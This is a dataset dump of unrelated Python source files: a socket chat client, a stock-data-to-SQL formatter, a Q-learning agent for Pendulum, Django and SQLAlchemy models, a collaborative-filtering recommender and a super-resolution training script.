c], [n - k, c/2 - k, 0]]\n\t\t\"\"\" % (dim, depth, max_age, cutoff_frac, geom))\n\n\n#format : n, c, k\nparam_file = open(result_dir + study_name + '-params.csv', 'rU')\nreader = csv.reader(param_file)\nparams = [row for row in reader][1:] #read from this csv\n\nparams = map(lambda row: map(float, row), params) #convert strings to floats\n\nresult_files = [f for f in listdir(result_dir) if f[-9:] == 'stats.csv']\nresult_indices = \\\nmap(\n\tlambda f: int(f[f.find('_') + 1 : f.find('-')]),\n\t result_files)\n\n\n\n\nfor i,param in enumerate(params):\n\tif i in result_indices:\n\t\tcontinue\n\n\t[n, c, k] = param\n\n\t#ask to skip, and if so, what last row to fill in with\n\tstat_fname = result_dir + study_name + '_' + str(i) + '-stats.csv'\n\t#ask to skip, and if so, what last row to fill in with\n\t# pause = raw_input(\"skip n = %.2f, c = %.2f, k = %.2f ? (prev index is %d) \" \n\t# \t% (n,c,k, i - 1))\n\t# if pause != \"n\":\n\t# \twith open(result_dir + study_name + '-skips.csv', 'a') as skipfile:\n\t# \t\tskipfile.write(\",\".join([str(i), pause]) + '\\n')\n\n\t\t\n\t# \tprev_fname = result_dir + study_name + '_' + pause + '-stats.csv'\n\t# \tprev_row = \",\".join(get_last_row(prev_fname)) + '\\n'\n\t# \twith open(stat_fname, 'w') as stat_file:\n\t# \t\tstat_file.write(prev_row)\n\t# \tcontinue\n\tpayoff = [[0,c/2,k-n],[1/2-c, 0, 1/2 + k - c], [n - k, c/2 - k, 0]]\n\tprint(\"setting up board %d (n, c, k) = (%.2f, %.2f, %.2f)...\" % (i, n, c, k))\n\tg = Game(\n\t\tpayoff,\n\t\tdepth,\n\t\tdim,\n\t\tmaxGen = max_age,\n\t\tname = result_dir + study_name + '_' + str(i),\n\t\tgeom = \"torus\")\n\tprint(\"running sim ...\")\n\n\twhile not g.isFinished():\n\t\tif g.age % 5e5 == 0:\n\t\t\tprint(\"gen: %d\" % g.age)\n\t\t\tif len(filter(lambda x: x < cutoff, g.count)) == max_death: #two things close to dying\n\t\t\t\tg.end()\n\t\t\t\tbreak\n\t\tg.update()\n\n\tprint(\"finished at: \" + \",\".join(get_last_row(stat_fname)))\nagg(result_dir, study_name)\n\n\n\n\n\n","sub_path":"Code/simulation/b3_scan.py","file_name":"b3_scan.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"593061745","text":"from socket import *\nfrom _thread import *\nfrom tkinter import *\n\n\ns = socket((AF_INET) , SOCK_STREAM)\n\n\nhost = \"127.0.0.1\"\nport = 8000\ns.connect((host , port))\n\n\nroot = Tk();\nroot.title(\"Client\")\nroot.geometry(\"400x200\")\n\nL1 = Label(root)\nL1.grid(row =3 , column=3)\n\nentry = Entry(root , width=\"40\")\nentry.grid(row =1 , column =3)\n\n\ndef Clicked():\n\tmessage = entry.get()\n\ts.send(message.encode('utf-8'))\n\tentry.delete(0 , END)\n\nbtn = Button(root , text = \"Send\" , bg =\"Red\" , fg = \"black\" , width =8 , height =1 , command=Clicked)\nbtn.grid(row=1 , column=4)\n\n\ndef recvThread(s):\n\twhile True:\n\t\tL1[\"text\"] = s.recv(1204).decode('utf-8')\n\nstart_new_thread(recvThread , (s,))\n\nroot.mainloop();","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"505419933","text":"\"\"\"\nfunctions to prepare data about a puzzle given from the animation for the ai training.\n\"\"\"\ndef state_for_ai(vpy_vectors):\n \"\"\"\n convert the current state of the puzzle into it's representation for the ai\n the colors are taken from the vpython objects\n\n inputs:\n -------\n vpy_vectors - (list) of vpython vectors - a list of vpython vectors 
representing colors in the puzzle\n\n returns:\n --------\n (list) of ints - state of the puzzle as list of color indices\n (list) - list of colors occuring in the puzzle\n index in the list is the same as it's representation in the ai state\n \"\"\"\n color_list = []\n ai_state = []\n for vec in vpy_vectors:\n if not vec in color_list:\n color_list.append(vec)\n color_index = len(color_list)-1\n else:\n color_index = 0\n while color_list[color_index] != vec:\n color_index += 1\n ai_state.append(color_index)\n \n return ai_state, color_list\n","sub_path":"project/twisty_puzzle_analysis/gui/ai_modules/ai_data_preparation.py","file_name":"ai_data_preparation.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"454610850","text":"from backpack.extensions.firstorder.base import FirstOrderModuleExtension\n\n\nclass SGSBase(FirstOrderModuleExtension):\n def __init__(self, derivatives, params=None):\n self.derivatives = derivatives\n self.N_axis = 0\n super().__init__(params=params)\n\n def bias(self, ext, module, g_inp, g_out, bpQuantities):\n grad_batch = self.derivatives.bias_jac_t_mat_prod(\n module, g_inp, g_out, g_out[0], sum_batch=False\n )\n return (grad_batch ** 2).sum(self.N_axis)\n\n def weight(self, ext, module, g_inp, g_out, bpQuantities):\n grad_batch = self.derivatives.weight_jac_t_mat_prod(\n module, g_inp, g_out, g_out[0], sum_batch=False\n )\n return (grad_batch ** 2).sum(self.N_axis)\n","sub_path":"backpack/extensions/firstorder/sum_grad_squared/sgs_base.py","file_name":"sgs_base.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"374536549","text":"from datetime import datetime\nimport sys\nimport os \nimport time\nimport openpyxl\n#import xlrd\n\nNULL_VALUE = \"null\"\ninsertCnt = 0 \nisFirstLine = True\ntry:\n\tprint(\"[FormatFile.py] 開始執行時間:\" + time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()))\n\n\tif len(sys.argv) < 2 :\n\t\tprint(\"You need input one parameter(fmt : 股票代號)\")\n\t\tprint(\"syntax : C:\\python FormatStocksSaleMonData.py 1326\")\n\t\tsys.exit()\n\n\tloadFileDir = \"csv\\\\goodinfo\\\\saleMonth\\\\\"\n\tsaveFileDir = \"txt\\\\goodinfo\\\\saleMonth\\\\\"\n\tinputFile = sys.argv[1] + \".xlsx\"\n\toutputFile = sys.argv[1] + \".txt\"\n\tstockNo = sys.argv[1]\n\t\n\toutfile = open(saveFileDir + outputFile, 'w')\n\n\twb = openpyxl.load_workbook('csv\\\\goodinfo\\\\saleMonth\\\\' + inputFile)\n\tsheet = wb[stockNo]\n\n\tisSTOP = False\n\tirow = 5\n\ticol = 1\n\n#\ttheList.append(\"insert into stocks_sale_month (stock_no,date,open_price_mon,end_price_mon,hgh_price_mon,low_price_mon,ups_downs,ups_downs_p,mon_revenue,mon_increase_in_revenue,ann_ins_revenue,cum_revenue,ann_ins_cum_revenue_p,csd_revenue,mon_ins_csd_revenue_p,ann_ins_csd_revenue_p,cum_csd_revenue,ann_ins_cum_csd_revenue_p) values ('\" + stockNo + \"'\")\n#\ttheSQLCmd = \"insert into stocks_sale_month (stock_no, date, open_price_mon, end_price_mon, hgh_price_mon, low_price_mon, ups_downs, ups_downs_p, mon_revenue, mon_increase_in_revenue, ann_ins_revenue, cum_revenue, ann_ins_cum_revenue_p, csd_revenue, mon_ins_csd_revenue_p, ann_ins_csd_revenue_p, cum_csd_revenue, ann_ins_cum_csd_revenue_p) values ('%s', '%d', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f')\"\n#\toutfile.write(theSQLCmd+\"\\n\")\n\twhile not isSTOP :\n\t\ttheList = []\n\t\ttheList.append(\"insert 
into stocks_sale_month (stock_no,date,open_price_mon,end_price_mon,hgh_price_mon,low_price_mon,ups_downs,ups_downs_p,mon_revenue,mon_increase_in_revenue,ann_ins_revenue,cum_revenue,ann_ins_cum_revenue_p,csd_revenue,mon_ins_csd_revenue_p,ann_ins_csd_revenue_p,cum_csd_revenue,ann_ins_cum_csd_revenue_p) values ('\" + stockNo + \"'\")\n\n\t\tfor icol in range(1, 18) :\n\t\t\ttheValue = sheet.cell(row = irow, column = icol).value\n#\t\t\tprint(theValue)\n#\t\t\tif sheet.cell(row = irow, column = icol).value == None :\n\t\t\tif icol == 1 and sheet.cell(row = irow, column = icol).value == None :\n\t\t\t\t\tisSTOP = True\n\t\t\t\t\ttheList.pop()\n\t\t\t\t\tbreak\n\t\t\telif type(theValue) == str :\n\t\t\t\tif theValue == \"-\" :\n\t\t\t\t\ttheValue = NULL_VALUE\n\t\t\t\ttheList.append(theValue)\n\t\t\telif type(theValue) == int :\n\t\t\t\ttheList.append(theValue)\n\t\t\telif type(theValue) == float :\n\t\t\t\ttheList.append(theValue)\n\t\t\telif type(theValue) == datetime :\n\t\t\t\ttheList.append(str(theValue.strftime(\"%Y%m%d\")))\n\t\t\telse :\n\t\t\t\ttheList.append(theValue)\n\t\tprint(theList)\n\t\tif len(theList) > 0 :\n\t\t\toutfile.write(\", \".join([str(_) for _ in theList]))\n\t\t\toutfile.write(\");\\n\")\n\t\tinsertCnt += 1\n\n\t\t# 預防錯誤,理論上應該不會超過100列\n\t\tif irow > 100 :\n\t\t\tprint(\"i=\" + str(irow))\n\t\t\tisSTOP = True\n\t\tirow += 1\n\n\toutfile.close()\n\t\nexcept IOError as err :\n\tprint('File error : ' + str(err))\n\nprint(\"資料處理完成!! 共 \" + str(insertCnt) + \" 筆。\")\nprint(\"[FormatFile.py] 結束執行時間:\" + time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()))\n\n\"\"\"\nstock_no\ndividend_year\ncash_div_surplus\ncash_div_reserve\ntotal_cash_div\nstock_div_surplus\nstock_div_reserve\ntotal_stock_div\ntotal_dividend\ntotal_div_cash\ntotal_div_stocks\ndays_fill_cash\ndays_fill_stocks\nstock_price_year\nyear_high_price\nyear_low_price\nyear_avg_price\navg_ann_cash_yield\navg_ann_stock_yield\navg_ann_yield\nperiod_of_dividend\neps\ndiv_earnings_dis_ratio\nalo_earnings_dis_ratio\nearnings_dis_ratio\n\"\"\"","sub_path":"myStocksPGMs4unix/V2.0/PolarisDataToDat/FormatStocksSaleMonData.py","file_name":"FormatStocksSaleMonData.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"143715298","text":"import os\n\ndef driver():\n for root, subdir, files in os.walk(os.getcwd()):\n if '.git' in root:\n continue\n\n for fn in files:\n fp = os.path.join(root, fn)\n\n with file(fp) as f:\n content = f.read()\n content = content.replace('\\r', '')\n with file(fp, 'wb') as f:\n f.write(content)\n\nif __name__ == '__main__':\n driver()\n","sub_path":"fix_newline_windows.py","file_name":"fix_newline_windows.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"587055113","text":"#!/usr/bin/env python\n\"\"\"\nNaive approach to Pendulum-v0.\nState space is digitized to allow learning with a standard tabular Q-Learner.\n\"\"\"\n\nimport gym\nimport numpy as np\nfrom agents.TabularQLearner import TabularQLearner\n\nif __name__ == '__main__':\n ## Setup gym\n env = gym.make('Pendulum-v0')\n\n ## Tabular Q Learner Setup\n costheta_bins = np.arange(-1.0, 1.2, 0.2)\n sintheta_bins = np.arange(-1.0, 1.2, 0.2)\n theta_dot_bins = np.arange(-8.0, 8.8, 0.8)\n\n state_bins = [costheta_bins, sintheta_bins, theta_dot_bins]\n action_bins = np.arange(-2.0, 2.2, 0.2)\n\n TQL = TabularQLearner(state_bins, action_bins, 
action_type=str(env.action_space), init_vals=0, plotting=True, plot_params=[-2000, 0, 0, 1])\n TQL.set_gamma(1.0)\n\n episodes = 0\n check_interval = 5000\n\n while True:\n env.reset()\n state_observation = None\n next_state_observation = None\n inspection_run = False\n\n for t in range(1000): # episode stops after 200 iterations when done signal is returned below\n\n if episodes % check_interval == 0:\n inspection_run = True\n env.render()\n else:\n inspection_run = False\n\n if inspection_run:\n epsilon = 0.0\n env.render()\n else:\n epsilon = max(0.01, min(0.5, 1 / (episodes * 1e-2)))\n\n TQL.set_epsilon(epsilon)\n action = TQL.get_action(state_observation) # returns random action if no observation passed\n\n next_state_observation, reward, done, info = env.step(action)\n\n if state_observation is not None and next_state_observation is not None and not inspection_run:\n alpha = max(0.01, min(0.3, 1 / (episodes * 1e-2)))\n TQL.set_alpha(alpha)\n TQL.update_q(next_state_observation, state_observation, action, reward)\n\n if done:\n TQL.update_plot_data()\n if inspection_run:\n print(\"Episode finished after {} timesteps, episode {}\".format(t + 1, episodes))\n TQL.update_plot(episodes)\n break\n\n state_observation = next_state_observation\n\n episodes = episodes + 1\n","sub_path":"Classic control/Pendulum-v0.py","file_name":"Pendulum-v0.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"342432079","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom ..LogReg.models import *\n# Create your models here.\nclass CourseManager(models.Manager):\n def basic_validator(self, postData):\n erros = {}\n if len(postData['name']) < 5:\n erros['name'] = \"Course name should be more than 5 characters\"\n if len(postData['Description']) < 15:\n erros['Description'] = \"Course description should be more than 15 characters\"\n return erros\nclass Course(models.Model):\n name = models.CharField(max_length=255)\n Description = models.TextField()\n created_at = models.DateTimeField(auto_now_add = True)\n user = models.ForeignKey(User, related_name = \"courses\")\n joined = models.ManyToManyField(User, related_name =\"joined_courses\")\n\n objects = CourseManager()\n","sub_path":"Django/Courses/apps/CourseFrame/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"400916490","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 25 15:04:05 2018\n\n@author: Aditya\n\"\"\"\n\nMAX_COL = 6\nMAX_ROW = 6\nN_IMAGES = MAX_COL * MAX_ROW\nIMAGE_SIZE = 2.15\nGAP_LD = 0.085\nGAP_HD = 0.85\nLINEAR_REWARD = [-1, 0, 4, 7, 10, 13]\nPOWER_REWARD = [-1, 0, 2, 3, 6, 20]\n\nLINEAR_REWARD_TEST = [-1, 0, 40, 70, 100, 130]\nPOWER_REWARD_TEST = [-1, 0, 20, 30, 60, 200]\n\n\nMAX_ACTIONS = N_IMAGES + 1\nCLICK_ACTION = N_IMAGES\nMAX_STEPS = 15\n\n#Properties\nHIGH_DENSITY = False\nLOW_DENSITY = True\nPOWER_FUNCTION = False\nLINEAR_FUNCTION = True\n\nHIGH_LINEAR_TIME = 0.325\nLOW_LINEAR_TIME = 0.310\nHIGH_POWER_TIME = 0.350\nLOW_POWER_TIME = 0.330","sub_path":"GlobalConstants.py","file_name":"GlobalConstants.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"206376171","text":"# coding:UTF-8\n# 2018-10-18\n# Collaborative Filtering\n\nimport numpy as np \n\ndef 
loadData(file_path):\n    \"\"\"\n    Load the data; the data is a matrix\n    \"\"\"\n    f = open(file_path) \n    data = []\n    for line in f.readlines():\n        lines = line.strip().split(\"\\t\")\n        tmp = []\n        for x in lines:\n            if x != \"-\":\n                tmp.append(float(x))\n            else:\n                # not yet rated\n                tmp.append(0)\n        data.append(tmp)\n    f.close()\n    \n    return np.mat(data)\n\n\ndef cosSimilary(x, y):\n    \"\"\"\n    Cosine similarity\n    \"\"\"\n    numerator = x * y.T \n    denominator = np.sqrt(x * x.T) * np.sqrt(y * y.T)\n    cos_sim = numerator / denominator\n    return cos_sim[0, 0]\n\n\ndef similarity(data):\n    \"\"\"\n    Compute the similarity between any two rows of the matrix\n    \"\"\"\n    m = np.shape(data)[0]\n    w = np.mat(np.zeros((m, m)))  # similarity matrix\n    for i in range(m):\n        for j in range(m):\n            if i != j:\n                w[i, j] = cosSimilary(data[i, :], data[j, :])\n                w[j, i] = w[i, j]\n            else:\n                w[i, j] = 0  # similarity of a row with itself is set to 0\n\n    return w \n\n\ndef userBasedRecommend(data, w, user):\n    \"\"\"\n    Recommend items to a user based on user similarity\n    Here data is the user-item matrix\n    a. select the items the user has not rated\n    b. score the unrated items using the similarities\n    c. sort the results\n    \"\"\"\n    m, n = np.shape(data)\n    interaction = data[user, :]\n\n    # a. select the items the user has not rated\n    not_inter = []\n    for i in range(n):\n        if interaction[0, i] == 0:\n            not_inter.append(i)\n\n    # b. score the unrated items using the similarities\n    predict = {}\n    for x in not_inter:\n        item = np.copy(data[:, x])  # all users' ratings for this item\n        for i in range(m):\n            if item[i, 0] != 0:\n                if x not in predict:\n                    predict[x] = w[user, i] * item[i, 0]  # similarity between this user and user i, times user i's rating of item x\n                else:\n                    predict[x] += w[user, i] * item[i, 0]\n\n    sort_predict = sorted(predict.items(), key=lambda d:d[1], reverse=True)\n\n    return sort_predict\n\n\ndef itemBasedRecommend(data, w, user):\n    \"\"\"\n    Recommend items for the user based on item similarity\n    Here data is the item-user matrix\n    \"\"\"\n    m, n = np.shape(data)\n    interaction = data[:, user].T\n\n    # a. select the items the user has not rated\n    not_inter = []\n    for i in range(n):\n        if interaction[0, i] == 0:\n            not_inter.append(i)\n\n    # b. score the unrated items using the similarities\n    predict = {}\n    for x in not_inter:\n        item = np.copy(interaction)  # the user's interaction record with all items\n        for j in range(m):  # for each item\n            if item[0, j] != 0:  # predict from the items the user has interacted with\n                if x not in predict:\n                    predict[x] = w[x, j] * item[0, j]\n                else:\n                    predict[x] = predict[x] + w[x, j] * item[0, j]\n\n    sort_predict = sorted(predict.items(), key=lambda d:d[1], reverse=True)\n\n    return sort_predict\n\n\ndef topK(predict, k):\n    \"\"\"\n    Recommend the top K items to the user\n    \"\"\"\n    top_recommend = []\n    len_predict = len(predict)\n    if k >= len_predict:\n        top_recommend = predict\n    else:\n        top_recommend = predict[ : k]\n    return top_recommend\n\n\nif __name__ == '__main__':\n    print(\"loading data...\")\n    data_file = \"data.txt\"\n    data = loadData(data_file)\n\n    # data handling for item-based collaborative filtering\n    # data = data.T\n\n    print(\"calculate similarity between items...\")\n    w = similarity(data)\n\n    print(\"predicting...\")\n    predict = userBasedRecommend(data, w, 0)\n\n    print(\"top k recommend\")\n    top = topK(predict, 2)\n    print(top)","sub_path":"MachineLearning/Collaborative Filtering/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"302279195","text":"from factory import Sequence, LazyAttribute\nfrom factory.alchemy import SQLAlchemyModelFactory\n\nfrom skybb.core import db\nfrom skybb.models import *\nfrom skybb.users.utils import hash_string\n\nclass SkybbSQLAlchemyModelFactory(SQLAlchemyModelFactory):\n    ABSTRACT_FACTORY = True\n\n    @classmethod\n    def _create(cls, target_class, *args, **kwargs):\n        obj = super(SkybbSQLAlchemyModelFactory, cls)._create(target_class,\n                *args, **kwargs)\n        session = cls.FACTORY_SESSION\n        session.commit()\n        session.refresh(obj)\n        return obj\n\nclass 
UserFactory(SkybbSQLAlchemyModelFactory):\n FACTORY_FOR = User\n FACTORY_SESSION = db.session\n email = Sequence(lambda n: 'user%d@email.com' % n)\n password = LazyAttribute(lambda a: hash_string('password'))\n username = Sequence(lambda n: 'user%d' % n)\n\ndef create_forum(name='name'):\n from skybb.forums.models import Forum\n f = Forum(name)\n db.session.add(f)\n db.session.commit()\n db.session.refresh(f)\n return f\n\ndef create_topic(title='title', body='body', user=None, forum=None):\n from skybb.forums.controllers import create_topic\n if not user:\n user = UserFactory()\n if not forum:\n forum = create_forum()\n p, t = create_topic(forum, user, title, body)\n db.session.add(p)\n db.session.add(t)\n db.session.commit()\n db.session.refresh(p)\n db.session.refresh(t)\n return p, t, forum, user\n\ndef create_post(title='title', body='body', user=None, topic=None):\n from skybb.forums.controllers import reply_to_topic\n if not topic:\n _, topic, forum, user = create_topic(user=user)\n else:\n forum = topic.forum\n if not user:\n user = UserFactory()\n p = reply_to_topic(topic, user, title, body)\n db.session.add(p)\n db.session.commit()\n db.session.refresh(p)\n return p, topic, forum, user\n","sub_path":"tests/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"65774455","text":"import argparse\nimport logging\nimport math\nimport os\nimport random\n\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\n\nimport options as option\nfrom data import create_dataloader, create_dataset\nfrom data.data_sampler import DistIterSampler\nfrom models import create_model\nfrom utils import util\n\n\ndef init_dist(backend=\"nccl\", **kwargs):\n \"\"\" initialization for distributed training\"\"\"\n # if mp.get_start_method(allow_none=True) is None:\n if (\n mp.get_start_method(allow_none=True) != \"spawn\"\n ): # Return the name of start method used for starting processes\n mp.set_start_method(\"spawn\", force=True) ##'spawn' is the default on Windows\n rank = int(os.environ[\"RANK\"]) # system env process ranks\n num_gpus = torch.cuda.device_count() # Returns the number of GPUs available\n torch.cuda.set_device(rank % num_gpus)\n dist.init_process_group(\n backend=backend, **kwargs\n ) # Initializes the default distributed process group\n\n\ndef main():\n #### setup options of three networks\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-opt_P\",\n type=str,\n default=\"options/train/Predictor/train_Predictor_x4.yml\",\n help=\"Path to option YMAL file of Predictor.\",\n )\n parser.add_argument(\n \"-opt_C\",\n type=str,\n default=\"options/train/Corrector/train_Corrector_x4.yml\",\n help=\"Path to option YMAL file of Corrector.\",\n )\n parser.add_argument(\n \"-opt_F\",\n type=str,\n default=\"options/test/SFTMD/test_SFTMD_x4.yml\",\n help=\"Path to option YMAL file of SFTMD_Net.\",\n )\n parser.add_argument(\n \"--launcher\", choices=[\"none\", \"pytorch\"], default=\"none\", help=\"job launcher\"\n )\n parser.add_argument(\"--local_rank\", type=int, default=0)\n args = parser.parse_args()\n opt_P = option.parse(args.opt_P, is_train=True)\n opt_C = option.parse(args.opt_C, is_train=True)\n opt_F = option.parse(args.opt_F, is_train=False)\n\n # convert to NoneDict, which returns None for missing keys\n opt_P = option.dict_to_nonedict(opt_P)\n opt_C = option.dict_to_nonedict(opt_C)\n opt_F = 
option.dict_to_nonedict(opt_F)\n\n #### set random seed\n seed = opt_P[\"train\"][\"manual_seed\"]\n if seed is None:\n seed = random.randint(1, 10000)\n util.set_random_seed(seed)\n\n # load PCA matrix of enough kernel\n print(\"load PCA matrix\")\n pca_matrix = torch.load(\n \"../../../pca_matrix/IKC/pca_matrix.pth\",\n map_location=lambda storage, loc: storage,\n )\n print(\"PCA matrix shape: {}\".format(pca_matrix.shape))\n\n #### distributed training settings\n if args.launcher == \"none\": # disabled distributed training\n opt_P[\"dist\"] = False\n opt_C[\"dist\"] = False\n rank = -1\n print(\"Disabled distributed training.\")\n else:\n opt_P[\"dist\"] = True\n opt_C[\"dist\"] = True\n init_dist()\n world_size = (\n torch.distributed.get_world_size()\n ) # Returns the number of processes in the current process group\n rank = torch.distributed.get_rank() # Returns the rank of current process group\n\n torch.backends.cudnn.benchmark = True\n # torch.backends.cudnn.deterministic = True\n\n ###### Predictor&Corrector train ######\n\n #### loading resume state if exists\n if opt_P[\"path\"].get(\"resume_state\", None):\n # distributed resuming: all load into default GPU\n device_id = torch.cuda.current_device()\n resume_state = torch.load(\n opt_P[\"path\"][\"resume_state\"],\n map_location=lambda storage, loc: storage.cuda(device_id),\n )\n option.check_resume(opt_P, resume_state[\"iter\"]) # check resume options\n else:\n resume_state = None\n\n #### mkdir and loggers\n if rank <= 0: # normal training (rank -1) OR distributed training (rank 0-7)\n if resume_state is None:\n # Predictor path\n util.mkdir_and_rename(\n opt_P[\"path\"][\"experiments_root\"]\n ) # rename experiment folder if exists\n util.mkdirs(\n (\n path\n for key, path in opt_P[\"path\"].items()\n if not key == \"experiments_root\"\n and \"pretrain_model\" not in key\n and \"resume\" not in key\n )\n )\n # Corrector path\n util.mkdir_and_rename(\n opt_C[\"path\"][\"experiments_root\"]\n ) # rename experiment folder if exists\n util.mkdirs(\n (\n path\n for key, path in opt_C[\"path\"].items()\n if not key == \"experiments_root\"\n and \"pretrain_model\" not in key\n and \"resume\" not in key\n )\n )\n\n os.system(\"rm ./log\")\n os.symlink(os.path.join(opt_P[\"path\"][\"experiments_root\"], \"..\"), \"./log\")\n\n # config loggers. Before it, the log will not work\n util.setup_logger(\n \"base\",\n opt_P[\"path\"][\"log\"],\n \"train_\" + opt_P[\"name\"],\n level=logging.INFO,\n screen=True,\n tofile=True,\n )\n util.setup_logger(\n \"val\",\n opt_P[\"path\"][\"log\"],\n \"val_\" + opt_P[\"name\"],\n level=logging.INFO,\n screen=True,\n tofile=True,\n )\n logger = logging.getLogger(\"base\")\n logger.info(option.dict2str(opt_P))\n logger.info(option.dict2str(opt_C))\n # tensorboard logger\n if opt_P[\"use_tb_logger\"] and \"debug\" not in opt_P[\"name\"]:\n version = float(torch.__version__[0:3])\n if version >= 1.1: # PyTorch 1.1\n from torch.utils.tensorboard import SummaryWriter\n else:\n logger.info(\n \"You are using PyTorch {}. 
Tensorboard will use [tensorboardX]\".format(\n version\n )\n )\n from tensorboardX import SummaryWriter\n tb_logger = SummaryWriter(log_dir=\"log/{}/tb_logger/\".format(opt_P[\"name\"]))\n else:\n util.setup_logger(\n \"base\", opt_P[\"path\"][\"log\"], \"train\", level=logging.INFO, screen=True\n )\n logger = logging.getLogger(\"base\")\n\n torch.backends.cudnn.benchmark = True\n # torch.backends.cudnn.deterministic = True\n\n #### create train and val dataloader\n dataset_ratio = 200 # enlarge the size of each epoch\n for phase, dataset_opt in opt_P[\"datasets\"].items():\n if phase == \"train\":\n train_set = create_dataset(dataset_opt)\n train_size = int(math.ceil(len(train_set) / dataset_opt[\"batch_size\"]))\n total_iters = int(opt_P[\"train\"][\"niter\"])\n total_epochs = int(math.ceil(total_iters / train_size))\n if opt_P[\"dist\"]:\n train_sampler = DistIterSampler(\n train_set, world_size, rank, dataset_ratio\n )\n total_epochs = int(\n math.ceil(total_iters / (train_size * dataset_ratio))\n )\n else:\n train_sampler = None\n train_loader = create_dataloader(\n train_set, dataset_opt, opt_P, train_sampler\n )\n if rank <= 0:\n logger.info(\n \"Number of train images: {:,d}, iters: {:,d}\".format(\n len(train_set), train_size\n )\n )\n logger.info(\n \"Total epochs needed: {:d} for iters {:,d}\".format(\n total_epochs, total_iters\n )\n )\n elif phase == \"val\":\n val_set = create_dataset(dataset_opt)\n val_loader = create_dataloader(val_set, dataset_opt, opt_P, None)\n if rank <= 0:\n logger.info(\n \"Number of val images in [{:s}]: {:d}\".format(\n dataset_opt[\"name\"], len(val_set)\n )\n )\n else:\n raise NotImplementedError(\"Phase [{:s}] is not recognized.\".format(phase))\n assert train_loader is not None\n assert val_loader is not None\n\n #### create model\n model_F = create_model(opt_F) # load pretrained model of SFTMD\n model_P = create_model(opt_P)\n model_C = create_model(opt_C)\n\n #### resume training\n if resume_state:\n logger.info(\n \"Resuming training from epoch: {}, iter: {}.\".format(\n resume_state[\"epoch\"], resume_state[\"iter\"]\n )\n )\n\n start_epoch = resume_state[\"epoch\"]\n current_step = resume_state[\"iter\"]\n model_P.resume_training(resume_state) # handle optimizers and schedulers\n else:\n current_step = 0\n start_epoch = 0\n\n #### training\n logger.info(\n \"Start training from epoch: {:d}, iter: {:d}\".format(start_epoch, current_step)\n )\n for epoch in range(start_epoch, total_epochs + 1):\n if opt_P[\"dist\"]:\n train_sampler.set_epoch(epoch)\n for _, train_data in enumerate(train_loader):\n current_step += 1\n if current_step > total_iters:\n break\n #### update learning rate, schedulers\n # model.update_learning_rate(current_step, warmup_iter=opt_P['train']['warmup_iter'])\n\n #### preprocessing for LR_img and kernel map\n prepro = util.SRMDPreprocessing(\n opt_P[\"scale\"],\n pca_matrix,\n random=True,\n para_input=opt_P[\"code_length\"],\n kernel=opt_P[\"kernel_size\"],\n noise=False,\n cuda=True,\n sig=opt_P[\"sig\"],\n sig_min=opt_P[\"sig_min\"],\n sig_max=opt_P[\"sig_max\"],\n rate_iso=1.0,\n scaling=3,\n rate_cln=0.2,\n noise_high=0.0,\n )\n LR_img, ker_map = prepro(train_data[\"GT\"])\n\n #### training Predictor\n model_P.feed_data(LR_img, ker_map)\n model_P.optimize_parameters(current_step)\n P_visuals = model_P.get_current_visuals()\n est_ker_map = P_visuals[\"Batch_est_ker_map\"]\n\n #### log of model_P\n if current_step % opt_P[\"logger\"][\"print_freq\"] == 0:\n logs = model_P.get_current_log()\n message = \"Predictor 
\".format(\n epoch, current_step, model_P.get_current_learning_rate()\n )\n for k, v in logs.items():\n message += \"{:s}: {:.4e} \".format(k, v)\n # tensorboard logger\n if opt_P[\"use_tb_logger\"] and \"debug\" not in opt_P[\"name\"]:\n if rank <= 0:\n tb_logger.add_scalar(k, v, current_step)\n if rank <= 0:\n logger.info(message)\n\n #### training Corrector\n for step in range(opt_C[\"step\"]):\n # test SFTMD for corresponding SR image\n model_F.feed_data(train_data, LR_img, est_ker_map)\n model_F.test()\n F_visuals = model_F.get_current_visuals()\n SR_img = F_visuals[\"Batch_SR\"]\n # Test SFTMD to produce SR images\n\n # train corrector given SR image and estimated kernel map\n model_C.feed_data(SR_img, est_ker_map, ker_map)\n model_C.optimize_parameters(current_step)\n C_visuals = model_C.get_current_visuals()\n est_ker_map = C_visuals[\"Batch_est_ker_map\"]\n\n #### log of model_C\n if current_step % opt_C[\"logger\"][\"print_freq\"] == 0:\n logs = model_C.get_current_log()\n message = \"Corrector \".format(\n epoch, current_step, model_C.get_current_learning_rate()\n )\n for k, v in logs.items():\n message += \"{:s}: {:.4e} \".format(k, v)\n # tensorboard logger\n if opt_C[\"use_tb_logger\"] and 